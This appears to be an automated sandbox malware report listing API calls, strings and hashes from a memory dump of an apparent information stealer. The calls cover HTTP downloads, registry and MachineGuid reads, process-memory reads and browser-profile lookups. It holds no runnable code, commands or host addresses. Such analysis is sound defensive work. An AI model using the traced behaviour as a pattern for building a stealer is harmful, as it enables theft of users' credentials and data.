                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405A7A
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405A98
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,0041FEE9), ref: 00405AE5
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,0041FEE9), ref: 00405B3B
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405B46
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405B50
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405B5A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                            • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                            • API String ID: 1851261701-2509457195
                                                                                                                                                                                                            • Opcode ID: bbde85d54317d74bc49b58ff975bd8dbab536fde0067ea99caf2cccf267b668e
                                                                                                                                                                                                            • Instruction ID: e21d45a569fd4ca9665c470c8ef0dfb583eaa1871c9a13eb6f94b2bca7a67973
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbde85d54317d74bc49b58ff975bd8dbab536fde0067ea99caf2cccf267b668e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C617D71900518AFEB10DBA4DC85FEFB779EB49704F00417AFA05B3281DB786E498BA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404B7B
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404B82
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404BA0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 00404BB6
                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BE1
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00404C1B
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404C40
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C52
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404C74
                                                                                                                                                                                                            • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404CE4
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404D15
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404D1F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404D29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                            • API String ID: 442264750-1805413626
                                                                                                                                                                                                            • Opcode ID: a04fa77e993117e9ae6753620fccfb9e201f0dbe7e63d19d445a57339d57b18b
                                                                                                                                                                                                            • Instruction ID: 8cd9884ad1fc3f3f03916256708021e697921895d0734bb802fa2eb576915c65
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a04fa77e993117e9ae6753620fccfb9e201f0dbe7e63d19d445a57339d57b18b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 596164B5A00219ABEB20DBA4DC45FEF77B9EB89710F104129FA05F72C0D7789904CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,00CB65D8,00000000,00020019,00000000,00426EEF,?,00000001), ref: 0041073F
                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(00000000,?,?,TsB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041079E
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004107C7
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107E5
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00CC1C30,00000000,000F003F,?,00000400), ref: 00410815
                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0041082A
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00CC1B58,00000000,000F003F,?,00000400,00000000,00421861,?,00000000,?,00426F20), ref: 004108AE
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                            • String ID: - $%s\%s$?$TsB$TsB
                                                                                                                                                                                                            • API String ID: 1989970852-2363097296
                                                                                                                                                                                                            • Opcode ID: 42c929a5319494dbfdd80b447cab84c491721e04517d8dafdc4a260e5da28095
                                                                                                                                                                                                            • Instruction ID: c37df9196de91915ab64f267fc4f9f5e18cc47e0870841395467f1ab9e04a580
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42c929a5319494dbfdd80b447cab84c491721e04517d8dafdc4a260e5da28095
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84813CB191012DABDB14DB95DC94EEEB7B9FF48704F10416EF506B3281DB786A08CBA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040FA2B
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FA53
                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FA74
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FAB0
                                                                                                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FB0B
                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FB18
                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FB5E
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FBAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • N0ZWFt, xrefs: 0040FB59, 0040FB69
                                                                                                                                                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FAC6, 0040FBC3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                            • API String ID: 47329967-1622206642
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C48
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(004218D9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C81
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410CCD
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410CD4
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410D11
                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00426EC8), ref: 00410D20
                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410BC5
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00410D42
                                                                                                                                                                                                              • Part of subcall function 00411A30: malloc.MSVCRT ref: 00411A41
                                                                                                                                                                                                              • Part of subcall function 00411A30: strncpy.MSVCRT ref: 00411A51
                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00410D70
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                            • String ID: :\$C$}A$}A
                                                                                                                                                                                                            • API String ID: 2389002695-1871846370
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                              • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                              • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413AE4
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421EC9), ref: 00413AFB
                                                                                                                                                                                                              • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,00413B11,?,00000001,00000004,?,00413B10,00000000,00000000), ref: 004115CC
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00413B27
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00413B3C
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00413B59
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$#B
                                                                                                                                                                                                            • API String ID: 2440237315-3466126190
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405805
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,0000000B), ref: 00405831
                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405856
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405879
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405892
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,000000FF,0041FE98,00000000,?,?,?,?,?,?,0000000B), ref: 004058B6
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004058E0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 004058FC
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405903
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040590A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 105467990-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040E8E5
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1D0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040EA0C
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240), ref: 0040EBC0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0), ref: 0040ECC3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040E8E5
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1D0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040EA0C
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240), ref: 0040EBC0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0), ref: 0040ECC3
                                                                                                                                                                                                              • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042691B,0042691A,?,?), ref: 0040E22D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00418460: LoadLibraryA.KERNEL32(kernel32.dll,00418370), ref: 00418465
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(00000000,00CAF390), ref: 00418480
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF1B0), ref: 004184AD
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF210), ref: 004184C6
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF2E8), ref: 004184DE
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4E0), ref: 004184F6
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2F10), ref: 0041850F
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2A40), ref: 00418527
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2C60), ref: 0041853F
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF498), ref: 00418558
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4F8), ref: 00418570
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4C8), ref: 00418588
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF510), ref: 004185A1
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2A60), ref: 004185B9
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF528), ref: 004185D1
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4B0), ref: 004185EA
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 00410100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00418382,004271D3), ref: 0041010C
                                                                                                                                                                                                              • Part of subcall function 00410100: HeapAlloc.KERNEL32(00000000,?,?,?,00418382,004271D3), ref: 00410113
                                                                                                                                                                                                              • Part of subcall function 00410100: GetUserNameA.ADVAPI32(00000000,004271D3), ref: 00410127
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CB2F60,?,0042769C,?,00000000,004271D3), ref: 004183E2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004183F1
                                                                                                                                                                                                            • Sleep.KERNEL32(00001B58), ref: 004183FC
                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418412
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041842C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041843A
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00418442
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitLibraryLoadNameSleepUserlstrcatlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3002421637-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 1274457161-4251816714
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00410B35
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B52
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B74
                                                                                                                                                                                                            • CharToOemA.USER32(00000000,?), ref: 00410B92
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                            • API String ID: 1728412123-1211650757
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8), ref: 0041056E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8,00000000), ref: 00410575
                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410595
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004105BB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                            • String ID: %d MB$@
                                                                                                                                                                                                            • API String ID: 3644086013-3474575989
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
